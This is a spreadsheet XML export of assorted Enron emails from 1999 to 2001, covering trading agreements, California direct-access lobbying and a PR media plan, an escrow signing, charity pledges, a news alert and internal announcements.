    <t>Mon, 24 May 1999 16:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lkitchen@enron.co.uk', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Access and Trading Agreements</t>
  </si>
  <si>
    <t>Attached are clean and blacklined versions of the Access Agreement and _x000D_
Trading Agreement, which have been revised to reflect Mark's comments and _x000D_
some additional changes we have made.  Please call or e-mail with any _x000D_
questions or comments.  Best regards._x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                         _x000D_
 - 5j%t02!.wpd_x000D_
 - 5j%tred.wpd_x000D_
 - 5j%w02!.wpd_x000D_
 - 5j%wred.wpd</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 10:46:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fw: RE: Bridgeline Cash and AR</t>
  </si>
  <si>
    <t>_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mrha, Jean &lt;Jean.Mrha@ENRON.com&gt;_x000D_
To: Kitchen, Louise &lt;Louise.Kitchen@ENRON.com&gt;_x000D_
Sent: Fri Oct 26 12:01:09 2001_x000D_
Subject: RE: Bridgeline Cash and AR_x000D_
_x000D_
He has not talked to me. He cc'd me on an email this morning - to which I replied. I planned on conversing with him this morning, but the email beat me to the punch.  He has been working independently on this effort. _x000D_
_x000D_
I had a lengthy conversation with Trevor last night, spoke with Sherman this morning and also met with Karen.  I have made Brian very aware of Karen's efforts to clean up BHLP - I do not understand why Deanna Washington is involved with BHLP at allm_x000D_
_x000D_
Mrha_x000D_
Jean Mrha</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 04:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: [Fwd: Direct Access Coalition Media Plan]</t>
  </si>
  <si>
    <t xml:space="preserve">Bill:  In order to assess, I need to understand the structure.  What's the _x000D_
contract structure look like now?  What are we proposed to change, including _x000D_
counterparties?  What part of the existing contract required any PUC approval _x000D_
and why?  What is Edison saying needs to happen at the PUC?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	William Gang@EES_x000D_
	03/01/2001 10:48 AM_x000D_
		 _x000D_
		 To: Charles Thompson/HOU/EES@EES, Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: RE: [Fwd: Direct Access Coalition Media Plan]_x000D_
_x000D_
Can we answer Paul's question?_x000D_
_x000D_
Bill_x000D_
---------------------- Forwarded by William Gang/HOU/EES on 03/01/2001 08:47 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Weaver Paul Civ 95 CEG/CEOEE &lt;Leo.Weaver@edwards.af.mil&gt; on 03/01/2001 _x000D_
09:45:30 AM_x000D_
To: "'wgang@enron.com'" &lt;wgang@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: [Fwd: Direct Access Coalition Media Plan]_x000D_
_x000D_
_x000D_
Bill,_x000D_
I was referring to the PDA (WAPA) which expires 1 OCT 01.  We've been_x000D_
advised it would take 6-8 months to cycle thru the CPUC after submittal._x000D_
I'm thinking it doesn't necessarily have to take that long before_x000D_
approval/implementation...what do you think?_x000D_
Paul_x000D_
-----Original Message-----_x000D_
From: wgang@enron.com [mailto:wgang@enron.com]_x000D_
Sent: Thursday, March 01, 2001 5:54 AM_x000D_
To: Leo.Weaver@edwards.af.mil_x000D_
Cc: Jeff.Dasovich@enron.com_x000D_
Subject: [Fwd: Direct Access Coalition Media Plan]_x000D_
_x000D_
_x000D_
Good morning, Paul.  I apologise for not getting back to you yesterday, but_x000D_
I am stuck in Seattle, and because of the earthquake, all flights are_x000D_
cancelled, andI haven't been able to get on line until this morning.  It_x000D_
has affected the phone connections._x000D_
_x000D_
There hasn't been much movement in the positions regarding open access in_x000D_
the past week, so a conference call will not be fruitful at the moment._x000D_
The possible exception to this may be provided by Jeff Dasovich, who is_x000D_
going to a meeting in Sacramento today.  If new information is promulgated_x000D_
by that meeting, Jeff will email me, and I will set up a call for tomorrow._x000D_
Otherwise, let's plan on next Friday.  As usual, I will get breaking_x000D_
information to you when it happens._x000D_
_x000D_
Also, in your last email, you said that someone from SCE is telling you_x000D_
that it will take 6-8 months for the CPUC to process a new contract, and_x000D_
Edwards was concerned that this may impact the PDA.  For clarification, the_x000D_
"new contract" you referred to--is that the potential contract for_x000D_
electricity that  we have been working on, or are you referring to_x000D_
something else?_x000D_
_x000D_
Hope I can get out of here today!_x000D_
_x000D_
Regards,_x000D_
Bill_x000D_
---------------------- Forwarded by William Gang/HOU/EES on 03/01/2001_x000D_
05:42 AM ---------------------------_x000D_
_x000D_
From: Jeff Dasovich@ENRON on 02/28/2001 12:41 PM_x000D_
_x000D_
Sent by:  Jeff Dasovich@ENRON_x000D_
_x000D_
_x000D_
To:   William Gang/HOU/EES@EES_x000D_
cc:_x000D_
Subject:  [Fwd: Direct Access Coalition Media Plan]_x000D_
_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 02/28/2001 12:40 PM -----_x000D_
_x000D_
_x000D_
                    Scott Govenar_x000D_
_x000D_
                    &lt;sgovenar@gov       To:_x000D_
_x000D_
                    adv.com&gt;            cc:_x000D_
_x000D_
                                        Subject:_x000D_
_x000D_
                    02/28/2001_x000D_
_x000D_
                    11:00 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Attached, please find the latest information from the direct access_x000D_
coalition._x000D_
_x000D_
_x000D_
_x000D_
Received: (qmail 77871 invoked by uid 41); 28 Feb 2001 04:07:03 -0000_x000D_
Received: from nycxims1.edelman.com (63.96.56.110)  by mx7.quiknet.com with_x000D_
SMTP; 28 Feb 2001 04:07:03 -0000_x000D_
Received: by nycxims1.edelman.com with Internet Mail Service (5.5.2653.19)_x000D_
id &lt;FY7A0FGF&gt;; Tue, 27 Feb 2001 22:46:37 -0500_x000D_
Message-ID: &lt;F1011D165600D411AC5400D0B720EE10A621F8@SFOXMB1&gt;_x000D_
From: "Fairchild, Tracy" &lt;tracy.fairchild@edelman.com&gt;_x000D_
To: dhunter@smithandkempton.com, brbarkovich@earthlink.net,_x000D_
wbooth@booth-law.com, drothrock@cmta.net, jackson_gualco@gualcogroup.com,_x000D_
kmills@cfbf.com, kmccrea@sablaw.com, mday@gmssr.com,_x000D_
nplotkin@tfglobby.com, spahnn@hnks.com, wlarson@calstate.edu,_x000D_
vincent.stewart@ucop.edu, gharrison@calstate.edu, sgovenar@govadv.com,_x000D_
hgovenar@govadv.com, smccubbi@enron.com, lhastings@cagrocers.com,_x000D_
theo@ppallc.com, cra@calretailers.com, mmoretti@calhealth.org,_x000D_
wbrown@lhom.com, randy_britt@robinsonsmay.com, "DiMare, Dominic"_x000D_
&lt;Dominic.DiMare@calchamber.com&gt;, vjw@ceert.org, rcavanagh@nrdc.org,_x000D_
rochmanm@spurr-remac.org, rrichter@calhealth.org, ken_pietrelli@ocli.com,_x000D_
dennis.flatt@kp.org, richard.seguin@kp.org, arm@phaser.com,_x000D_
djsmith@smithandkempton.com, "Fairchild, Tracy"_x000D_
&lt;tracy.fairchild@edelman.com&gt;, "Allen, Stevan"_x000D_
&lt;stevan.allen@edelman.com&gt;, "Beiser, Megan" &lt;Megan.Beiser@edelman.com&gt;,_x000D_
"Manuel, Erica" &lt;Erica.Manuel@edelman.com&gt;, "Warner, Jami"_x000D_
&lt;jami.warner@edelman.com&gt;_x000D_
Subject: Direct Access Coalition Media Plan_x000D_
Date: Tue, 27 Feb 2001 22:46:28 -0500_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2653.19)_x000D_
Content-Type: multipart/mixed;     boundary="_x000D_
----_=_NextPart_000_01C0A139.07D39B10"_x000D_
X-Mozilla-Status2: 00000000_x000D_
_x000D_
_x000D_
Hello to the Direct Access Coalition:_x000D_
_x000D_
Below you will find a summary of the press strategy that Edelman Public_x000D_
Relations intends to employ over the coming weeks in collaboration with the_x000D_
Alliance for Retail Energy Markets and the broader Direct Access Coalition._x000D_
I will also outline the information that I need from Direct Access_x000D_
Coalition_x000D_
members who are willing to be involved in media outreach and interviews._x000D_
And finally, I have attached supporting documents that you can use as_x000D_
background material to prep for your responses to any media inquiries that_x000D_
you may receive._x000D_
_x000D_
This Week_x000D_
_x000D_
1.   We are drafting a "pitch letter" to send out by the end of this week_x000D_
via blast e-mail and fax to the following media lists: 1)capitol press_x000D_
corps_x000D_
reporters; 2) mainstream media reporters working the energy crisis; and 3)_x000D_
trade media.  We may also outreach to our editorial board list as well._x000D_
Our_x000D_
pitch will be focused on what it will really mean for small business and_x000D_
C&amp;I_x000D_
customers to lose the option of retail choice at a time when they are_x000D_
suffering the financial hardships of skyrocketing energy bills. We will_x000D_
address the effect on California's future business climate if direct access_x000D_
is not preserved through legislation that corrects the problems that AB1x_x000D_
caused for retail choice.  And finally, we will address the point that no_x000D_
matter what direction California ultimately takes, direct access must be a_x000D_
part of the solution.  Reporters have seen the recent polls which_x000D_
illustrate_x000D_
California businesses' concerns with the path the state is on so this is a_x000D_
prime opportunity to build on those recent media stories._x000D_
_x000D_
2.    We recommend a conference call with AReM and the Direct Access_x000D_
Coalition on Friday to address the questions and suggestions on the press_x000D_
strategy outlined here._x000D_
_x000D_
3.     Determine which people in the Direct Access Coalition are willing to_x000D_
take media calls on behalf of the coalition._x000D_
_x000D_
Next Week_x000D_
_x000D_
1.   Follow up with key reporters who received the pitch letter._x000D_
_x000D_
2.   Evaluate the language of SB 27x and determine whether there will be an_x000D_
opportunity to hold a news conference with Sen. Bowen in the near future._x000D_
Monitor movement at the PUC and determine whether a press conference may be_x000D_
effective in this arena, or whether we may need to use the option of_x000D_
sending_x000D_
a media alert before the March 7 hearing, followed by a news release after_x000D_
the hearing._x000D_
_x000D_
3.   Place op-eds (opinion pieces) with key newspapers._x000D_
_x000D_
4.   Contact radio news shows and TV public affairs shows (i.e. California_x000D_
Capitol Week and the California Report) to secure_x000D_
media interviews._x000D_
_x000D_
5.    Revise the SB 27x fact sheet (attached) to reflect the realities of_x000D_
the amended language in SB 27x._x000D_
_x000D_
 What We Need From You_x000D_
_x000D_
1.  If you are willing to speak with the media, or you have_x000D_
customers/clients with a positive direct access story to tell, please_x000D_
respond to this email as soon as you can with your name and contact_x000D_
information._x000D_
_x000D_
2.  If you have draft op-eds written that need to be placed with newspapers_x000D_
on behalf of your association and the broader coalition, we are willing to_x000D_
do this for the you._x000D_
_x000D_
3.  If you have colleagues and/or staff that are already working with the_x000D_
media it would be helpful to have this information so that we can_x000D_
collaborate as necessary._x000D_
_x000D_
The Documents Below_x000D_
_x000D_
&gt;  All documents are works in progress, so if you have suggestions on_x000D_
&gt; potential changes, please feel free to share them with us._x000D_
&gt;_x000D_
_x000D_
Thank you._x000D_
_x000D_
&gt;  &lt;&lt;AREM Fact Sheet 2212001 ver 2272001.doc&gt;&gt;_x000D_
&gt;  &lt;&lt;Q&amp;A @ ESP Reversions 22701.doc&gt;&gt;  &lt;&lt;AReM FAQ FINAL3.doc&gt;&gt;  &lt;&lt;AREM Fact_x000D_
&gt; FINAL3.doc&gt;&gt;_x000D_
&gt;_x000D_
&gt; Tracy Fairchild_x000D_
&gt; Account Supervisor_x000D_
&gt; Edelman Public Relations Worldwide_x000D_
&gt; (916) 442-2331_x000D_
&gt; tracy.fairchild@edelman.com_x000D_
&gt;_x000D_
_x000D_
(See attached file: AREM Fact Sheet 2212001 ver 2272001.doc)_x000D_
(See attached file: Q&amp;A @ ESP Reversions 22701.doc)_x000D_
(See attached file: AReM FAQ FINAL3.doc)_x000D_
(See attached file: AREM Fact FINAL3.doc)_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 10:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: 2001 MS150</t>
  </si>
  <si>
    <t>Sherri,_x000D_
_x000D_
I would be happy to support Jeff.  I've sponsored 5 other people  for MS150 _x000D_
also but please put me down for $500 for Jeff.  If i am being cheap, let me _x000D_
know.  _x000D_
_x000D_
Thanks,_x000D_
mike</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 03:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, we have been working with them.  Stephanie and I were asked to meet last _x000D_
week with the heads of the California Chamber and the California _x000D_
Manufacturer's Association, at which we discussed demand buy down, etc. at _x000D_
length.  It was a very positive meeting.  _x000D_
_x000D_
Stephanie left them with Reliant's Westwide demand exchange program.  And I _x000D_
believe that our folks (Jim?) are meeting with Reliant to discuss it further _x000D_
in D.C.  _x000D_
_x000D_
I can fax you a copy of what they're walking around if you don't have it.  _x000D_
I'll let others chime in, but seems to me that it would be very useful to _x000D_
contact him._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Susan M Landwehr_x000D_
	04/22/2001 05:12 PM_x000D_
		 _x000D_
		 To: Paul Kaufman/PDX/ECT@ECT, Jeff Dasovich/NA/Enron@Enron, Susan J _x000D_
Mara/NA/Enron@ENRON_x000D_
		 cc: Karen Denne/Corp/Enron@ENRON_x000D_
		 Subject: Reliant_x000D_
_x000D_
Hey guys.  Are we in communication or working with Reliant in California?  In _x000D_
particular, a guy by the name of  John Stout or a woman (I think she's PR) _x000D_
named Stephanie Newell?  My understanding is that they are shopping a demand _x000D_
exchange idea---in particular in Utah.  I would like to contact him in _x000D_
preparation for the RGA meeting in Los Angeles, but wanted to check with you _x000D_
all first to see what we might already be doing with them._x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 10:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: ESCROW AGREEMENT</t>
  </si>
  <si>
    <t xml:space="preserve">Have I signed this yet?_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 05/31/2001 05:18 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Reuter, Marisa" &lt;MReuter@KSLAW.com&gt; on 05/31/2001 04:12:56 PM_x000D_
To: "'Kay.mann@enron.com'" &lt;Kay.mann@enron.com&gt;_x000D_
cc: "Keffer, John" &lt;JKeffer@KSLAW.com&gt; _x000D_
_x000D_
Subject: FW: ESCROW AGREEMENT_x000D_
_x000D_
_x000D_
Kay:_x000D_
_x000D_
The Escrow Agreement that is attached appears to be in final form and_x000D_
contains all of the changes that we requested.  As a result, will you_x000D_
overnight the sig pages and the incumbency certificate to Tremaine Wright?_x000D_
If you prefer, you can courier the documents to my attention, and I can_x000D_
coordinate getting them to Paul Hastings.  Tremaine needs 3 sig pages and 1_x000D_
incumbency certificate.  Thanks._x000D_
_x000D_
Regards,_x000D_
_x000D_
Marisa_x000D_
_x000D_
-----Original Message-----_x000D_
From: Wright, Tremaine S. [mailto:TremaineWright@paulhastings.com]_x000D_
Sent: Thursday, May 31, 2001 3:53 PM_x000D_
To: 'mreuter@kslaw.com'; 'estelle.a.lawrence@citi.com'_x000D_
Subject: ESCROW AGREEMENT_x000D_
_x000D_
_x000D_
_x000D_
"paulhastings.com" made the following annotations on 05/31/01 16:52:42_x000D_
----------------------------------------------------------------------------_x000D_
--_x000D_
NEW E-MAIL ADDRESSES AT PAUL, HASTINGS, JANOFSKY &amp; WALKER LLP_x000D_
_x000D_
We have changed our e-mail address.  Our new domain name is_x000D_
paulhastings.com.  In most cases, our address is composed of_x000D_
conventional first name and last name plus @paulhastings.com.  Here are_x000D_
two examples: janesmith@paulhastings.com and danjones@paulhastings.com._x000D_
If you have any questions, please contact us at noc@paulhastings.com._x000D_
_x000D_
============================================================================_x000D_
==_x000D_
"The information transmitted is intended only for the person or entity_x000D_
to which it is addressed and may contain confidential and/or privileged_x000D_
material. Any review, retransmission, dissemination or other use of, or_x000D_
taking of any action in reliance upon, this information by persons or_x000D_
entities other than the intended recipient is prohibited. If you_x000D_
received this in error, please contact the sender and delete the_x000D_
material from all computers."_x000D_
_x000D_
============================================================================_x000D_
==_x000D_
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Content-Transfer-Encoding: 7bit_x000D_
To:_x000D_
Subject:_x000D_
Date: Thu, 31 May 2001 17:15:34 -0400_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2653.19)_x000D_
Content-Type: multipart/mixed ; _x000D_
boundary="----_=_NextPart_002_01C0EA16.7657F5B0"_x000D_
_x000D_
_x000D_
_x000D_
 - ATT43428.txt_x000D_
 - ATT43429.htm_x000D_
 - 757N05!.DOC_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 01:20:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kaminski@aol.com', 'kamins@ect.enron.com'})</t>
  </si>
  <si>
    <t>E-CARD from Ludmila Kaminski</t>
  </si>
  <si>
    <t>_x000D_
??Greetings!??Ludmila Kaminski has sent you an E-Card -- a virtual postcard from E-Cards.com.?You can pickup your card at the E-Cards.com website.??-&gt; If your e-mail is hot-link enabled click here:?   http://www.e-cards.com/pickup/pickup1.pl?code=42131-vkami?   or...?   &lt;a href="http://www.e-cards.com/pickup/pickup1.pl?code=42131-vkami"&gt;42131-vkami&lt;/a&gt;??-&gt; If not point your web browser to:?   http://www.e-cards.com/?   visit the card pickup page?   then enter your pickup code: 42131-vkami??Your E-Card will be saved for pickup for 15 days from the date of sending.??Enjoy your E-Card!???_x000D_
   Sending E-Cards helps support Wildlife and the Environment._x000D_
     Every E-Card sent results in a donation from E-Cards to_x000D_
          World Wildlife Fund or The Nature Conservancy!_x000D_
_x000D_
?</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 03:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kmurra1@lsu.edu'})</t>
  </si>
  <si>
    <t>Re: update</t>
  </si>
  <si>
    <t xml:space="preserve">Also, send me a copy of your resume.  thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Kevin B Murray" &lt;kmurra1@lsu.edu&gt; on 03/04/2001 12:20:04 PM_x000D_
To: Scott.Neal@enron.com_x000D_
cc:  _x000D_
Subject: update_x000D_
_x000D_
_x000D_
Scott:_x000D_
_x000D_
Greetings from LSU.  I sent you an email a few weeks ago, but perhaps you_x000D_
didn't receive it.  No big deal._x000D_
_x000D_
I just wanted to drop you a line and let you know how I'm doing.  My last_x000D_
semester is shaping up to be pretty tough.  The MBA class in Real Options_x000D_
is, to say the least, tough!  I'm preparing for my mid-term right now, and_x000D_
so far we've learned about Binomial trees, Sharpe ratios, the GOPOP model,_x000D_
risk-neutral pricing, Stochastic Processes, Black-Scholes and Monte Carlo,_x000D_
and pricing American, European, and exotic options.  What's also great_x000D_
about the class is that our professor constantly uses Enron as an example_x000D_
of how this stuff works in the real world.  It's a great class!_x000D_
_x000D_
One of my other classes, Economic Forecasting, is challenging as well,_x000D_
because I'm dealing with a software package, Eviews, for the first time._x000D_
Enough about the academics, though; I'm working hard and that's what I need_x000D_
to be doing._x000D_
_x000D_
I've also started reading Reminiscences, and I find myself highlighting_x000D_
lines on every page!  I figured I'd start with the less technical books_x000D_
first, considering my workload._x000D_
_x000D_
I'm going to be in Houston looking for apartments this weekend, 3/9 - 3/11_x000D_
with my roommate, Ed Brady, who will also be at Enron in July.  Let me know_x000D_
how your schedule looks, and maybe we can get together._x000D_
_x000D_
Hopefully my getting into your fundamentals group or the new trading_x000D_
rotation that you spoke of is still a high probability.  As I'm learning_x000D_
more about options and futures in class, you're definitely right--I think_x000D_
trading is where I want to be!_x000D_
_x000D_
Thanks again and I hope to hear from you soon.  I hope all is well in_x000D_
Houston._x000D_
_x000D_
Kevin_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 08:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Me and Willis Tree Farm</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Scott Neal/HOU/ECT on 10/03/2000 03:02 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Conrad Neal" &lt;cneal@bluegate.com&gt; on 09/15/2000 04:12:16 PM_x000D_
Please respond to &lt;cneal@bluegate.com&gt;_x000D_
To: "'Neal, Scott'" &lt;sneal@enron.com&gt;, "'Neal, Todd'" &lt;todd.neal@chron.com&gt;, _x000D_
"'Neal, John'" &lt;muddywaters@hubserv.com&gt;, "'Neal, William'" _x000D_
&lt;billnealmd@hotmail.com&gt;, "'Neal, Chris'" &lt;chrisn@thisco.com&gt;, "'Neal, Eric'" _x000D_
&lt;ericn@thisco.com&gt;_x000D_
cc:  _x000D_
Subject: Me and Willis Tree Farm_x000D_
_x000D_
_x000D_
Just wanted to let everyone know I started a new job last Friday:_x000D_
    Pipeline Power Partners_x000D_
    10000 Memorial Drive, Suite 200_x000D_
    Houston, Texas 77024_x000D_
    713-290-8762_x000D_
I'm back working on compressor stations and gas storage projects with some_x000D_
of the guys I worked with on the Columbia Gas Compressor station in '93-'94._x000D_
Note new email address also._x000D_
_x000D_
Barry called me last week about the well pump. It was not working and he had_x000D_
tried everything he knew to do. We decided to call Western Water Well_x000D_
Service in Conroe to check it out. Bottom line-it was beyond repair and we_x000D_
had to replace at a cost of $765.52. When our tenant at the time took it_x000D_
upon himself to dig a new well ($1500) he had them put in a real cheap_x000D_
pump-so that's why it went out in a relatively short period of time. We now_x000D_
have only $90 in the account so everyone needs to think about making a_x000D_
contribution sometime soon. If you have a question, please call._x000D_
_x000D_
Conrad_x000D_
_x000D_
 - winmail.dat_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 06:37:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>A CBS News employee in Dan Rather's office has reportedly tested positive_x000D_
for cutaneous anthrax._x000D_
_x000D_
http://abcnews.go.com/_x000D_
_x000D_
_x000D_
----------------------------------------------_x000D_
ABCNEWS.com:  Up to the Moment, Up to You (tm)_x000D_
http://abcnews.go.com_x000D_
---_x000D_
You received this mail because you subscribed via ABCNEWS.com. If you would like to stop receiving these mailings, log into our mailcenter at http://login.mailpref.go.com/unsubscribe ._x000D_
_x000D_
Please do not respond to this mail. Questions or comments can be submitted at_x000D_
http://abcnews.go.com/service/help/abccontact.html</t>
  </si>
  <si>
    <t>Sun, 14 May 2000 03:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Milly ._x000D_
_x000D_
If you're going to sell the warrants yourself. (It sounds like you should if _x000D_
your getting $2 in time value) let me know and I'll call off the equity _x000D_
group.</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 08:16:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.smith@enron.com', 'louise.kitchen@enron.com', 's..bradford@enron.com', 'vicki.sharp@enron.com', 'c..williams@enron.com', 'rick.buy@enron.com', 'richard.sanders@enron.com', 'tim.belden@enron.com', 'mark.palmer@enron.com', 'james.derrick@enron.com', 'michael.tribolet@enron.com', 'robert.frank@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'joseph.alamo@enron.com', 'steven.kean@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>CORRECTION NOTICE - California Litigation Weekly Conference Call</t>
  </si>
  <si>
    <t>There will not be a call on Thursday, June 14. =20_x000D_
_x000D_
Janette Elbertson_x000D_
Enron Wholesale Services_x000D_
Legal Department - EB3326_x000D_
Telephone:  (713) 853-7906_x000D_
Fax:  (713) 646-2600_x000D_
janette.elbertson@enron.com_x000D_
----- Forwarded by Janette Elbertson/HOU/ECT on 06/07/2001 10:15 AM -----_x000D_
_x000D_
_x000D_
=09Janette Elbertson 06/07/2001 10:07 AM =09   To: Al_Alexanderson@pgn.com,=_x000D_
 cecklund@llgm.com, dwatkiss@bracepatt.com, Dan Leff/HOU/EES@EES, david_aam=_x000D_
odt@pgn.com, David W Delainey/HOU/EES@EES, Douglas_Nichols@pgn.com, gfergus=_x000D_
@brobeck.com, Greg Whalley/HOU/ECT@ECT, jklauber@llgm.com, James D Steffes/=_x000D_
NA/Enron@Enron, James Derrick/Enron@EnronXGate, Joe Hartsoe/Corp/Enron@ENRO=_x000D_
N, Joseph Alamo/NA/Enron@Enron, Lisa Mellencamp/HOU/ECT@ECT, Louise Kitchen=_x000D_
/HOU/ECT@ECT, mday@gmssr.com, mark.e.haedicke@enron.com, Mark Palmer/Corp/E=_x000D_
nron@ENRON, Michael Smith/ENRON@enronxgate, Michael Tribolet/ENRON@enronXga=_x000D_
te, Robert Frank/NA/Enron@Enron, Richard B Sanders/HOU/ECT@ECT, Richard Sha=_x000D_
piro/NA/Enron@Enron, Rick Buy/Enron@EnronXGate, robert.c.williams@enron.com=_x000D_
, Robin_Tompkins@pgn.com, sbishop@gibbs-bruns.com, Sandra McCubbin/NA/Enron=_x000D_
@Enron, Steven J Kean/NA/Enron@Enron, Tim Belden/HOU/ECT@ECT, Vicki Sharp/H=_x000D_
OU/EES@EES, William S Bradford/Enron@EnronXGate  cc: Cristina Zavala/SF/ECT=_x000D_
@ECT, Debra Davidson/Enron@EnronXGate, Karen K Heathman/Enron@EnronXGate, K=_x000D_
ay Chapman/HOU/EES@EES, Ginger Dernehl@enron, Jody Underwood/NA/Enron, Kath=_x000D_
y Dodgen@EES, Kimberly Hillis/Enron@EnronXGate, Leasa Lopez/HOU/EES@EES, Li=_x000D_
nda J Simmons/HOU/ECT@ECT, Liz M Taylor/HOU/ECT@ECT, Mercy Gil/Enron@EnronX=_x000D_
Gate, Stephanie Harris/Enron@EnronXGate, Tammie Schoppe/HOU/ECT@ECT, Twanda=_x000D_
 Sweet/HOU/ECT@ECT  Subject: California Litigation Weekly Conference Call=_x000D_
=09_x000D_
_x000D_
_x000D_
The California Litigation weekly conference call scheduled for 2:00 p.m. to=_x000D_
day has been cancelled._x000D_
_x000D_
Also, please note there will not be a call on Thursday, June 15._x000D_
_x000D_
Thank you._x000D_
_x000D_
Janette Elbertson_x000D_
Enron Wholesale Services_x000D_
Legal Department - EB3326_x000D_
Telephone:  (713) 853-7906_x000D_
Fax:  (713) 646-2600_x000D_
janette.elbertson@enron.com</t>
  </si>
  <si>
    <t>Sat, 24 Jun 2000 14:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Vegas Golf</t>
  </si>
  <si>
    <t>I don't remember if I told you that Fletch and I will be playing golf on _x000D_
Saturday morning._x000D_
_x000D_
Thank You_x000D_
Hunter</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 10:52:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.domonoske@enron.com'})</t>
  </si>
  <si>
    <t>web site link</t>
  </si>
  <si>
    <t>Paul,_x000D_
_x000D_
Here is the link for where this information is located._x000D_
_x000D_
http://planet.enron.com , then go to benefits, then to enronassistance._x000D_
_x000D_
Thanks,  _x000D_
Sarah Domonoske_x000D_
Enron Global Markets_x000D_
Sr. Human Resources Assistant_x000D_
713.345.2521</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 14:07:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: NEPCO Cash</t>
  </si>
  <si>
    <t>What is driving the return of the cash?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dodson, Keith  _x000D_
Sent:	Wednesday, October 24, 2001 5:16 PM_x000D_
To:	Hayslett, Rod_x000D_
Cc:	Marlow, Keith; Lydecker Jr., Richard_x000D_
Subject:	NEPCO Cash_x000D_
_x000D_
Rod,_x000D_
_x000D_
We need to make sure Enron Treasury understands the $300 million plus of NEPCO cash will have to flow back in the next year.  I have been involved in two situations where some smart people in the treasury functions did not really understand this impact. There is more cash to come from the projects, but for the most part that represents the profits and that cash will not really be ours until we have cleared the retainages and LOC's. If we can get a couple of new projects in NEPCO, we might be able to sustain the balance, but nothing is secure at this time._x000D_
_x000D_
Keith</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 09:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Discounted tickets to 104 KRBE / Enron Earth Day are available for Enron=20_x000D_
employees to purchase for $16 (regular price =3D $20) on-line through the=_x000D_
=20_x000D_
Signature Shop at www.enronsigshop.com now until this Wednesday, April 4. =_x000D_
=20_x000D_
Concert information is available at www.104krbe.com.  Check out volunteer=_x000D_
=20_x000D_
opportunities in the Volunteer Section below!_x000D_
_x000D_
Give us your best shot and join Cliff Baxter to help raise funds for Junior=_x000D_
=20_x000D_
Achievement by participating in the Birdies for Charity Putting Contest in=_x000D_
=20_x000D_
the Enron Lobby on Tuesday, April 3, from 11 a.m. =01) 1 p.m. Watch for spe=_x000D_
cial=20_x000D_
appearances by Jeff Skilling, Greg Whalley and others!  Donate $5 and you=_x000D_
=20_x000D_
will have three chances to sink a putt and be entered to win some great gol=_x000D_
f=20_x000D_
prizes!=20_x000D_
_x000D_
Contingent Staffing Solutions - An New Enron Innovation -=20_x000D_
Frequent user of temporary employees for administrative / clerical support?=_x000D_
=20_x000D_
Then learn about Contingent Staffing Solutions (CSS) a new Enron innovation=_x000D_
=20_x000D_
designed to provide you with better, faster and more cost efficient service=_x000D_
=20_x000D_
when you need a temporary employee.   Come and hear all about it at our=20_x000D_
InfoSessions, scheduled for this Friday, April 6, 11:30 AM - 12:30 PM  in=_x000D_
=20_x000D_
EB5C2.  Cookies and drinks will be provided, plus register to win two ticke=_x000D_
ts=20_x000D_
to an upcoming Astros game._x000D_
_x000D_
The new 2000 Enron Annual Reports are now available and can be ordered=20_x000D_
through the Forms Management Group, Item #43884.  You may order them throug=_x000D_
h=20_x000D_
Moore Source eProcurement or fax in a Forms Requisition._x000D_
_x000D_
_x000D_
